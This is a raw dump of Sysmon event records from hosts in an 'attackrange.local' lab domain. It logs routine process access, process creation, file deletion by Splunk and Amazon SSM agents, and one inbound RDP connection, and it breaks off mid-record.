09:26:25.693{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981775Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981774Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981773Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981772Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981771Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981770Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8E41-6151-297A-00000000FD01}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981769Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.693{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E41-6151-297A-00000000FD01}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981768Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.678{69CF5F33-8E41-6151-297A-00000000FD01}708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981767Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.396{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55B589EC385C7AC259677B2DFB5BC709,SHA256=16FCA074D0D4E6462D86BA93425398EC7DBF8227B15BE35E2AFE8661F62D9D7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057430Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:25.607{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6E0948CA530D515E2852F22C67226FA,SHA256=79C9D42916FAD3B44D6F4BDB5B8EDBA026FD774AE2C5CCA1A2414A35A21E0F66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057429Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:25.607{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF35B44E1288A9CE4D8950D9CCF311AF,SHA256=C9C4CB9E844BC722DBD247BD7551826D582ED1A10F0098A64B553C4F1B089D77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057428Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:25.107{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=104828C3BF140C596E5FCB97418BC617,SHA256=907B2281BE0FB87CF9B1A83254FE6A58F087D96DA1F93D10B2D8CB5966FFA790,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981766Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:25.179{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4322MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981799Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:23.509{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58072-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000981798Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.551{69CF5F33-8E42-6151-2A7A-00000000FD01}40482336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000981797Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.551{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4D03789A93CFDC522382FAB4D35737D,SHA256=64642F3172D9E730A589728084A64DD435A3B617C2F413D5872B9576EA027E0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057432Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:26.426{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210927092018-005MD5=418358CD28D1B50422280074BE968B1D,SHA256=C8286C1C0A91E4E2C2FF9D12E0FDD08F235EAD61265C1678C815B6AB5A1254BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057431Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:26.189{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=805B933A767BD725833BC07166CC1E53,SHA256=8717A4690B157340DB045BF63919696FC3BD6FDA2CA9737A39720E3E99A909D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981796Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.395{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E42-6151-2A7A-00000000FD01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981795Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8E42-6151-2A7A-00000000FD01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981794Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981793Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981792Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981791Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981790Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981789Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981788Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981787Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981786Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981785Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:26.379{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E42-6151-2A7A-00000000FD01}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 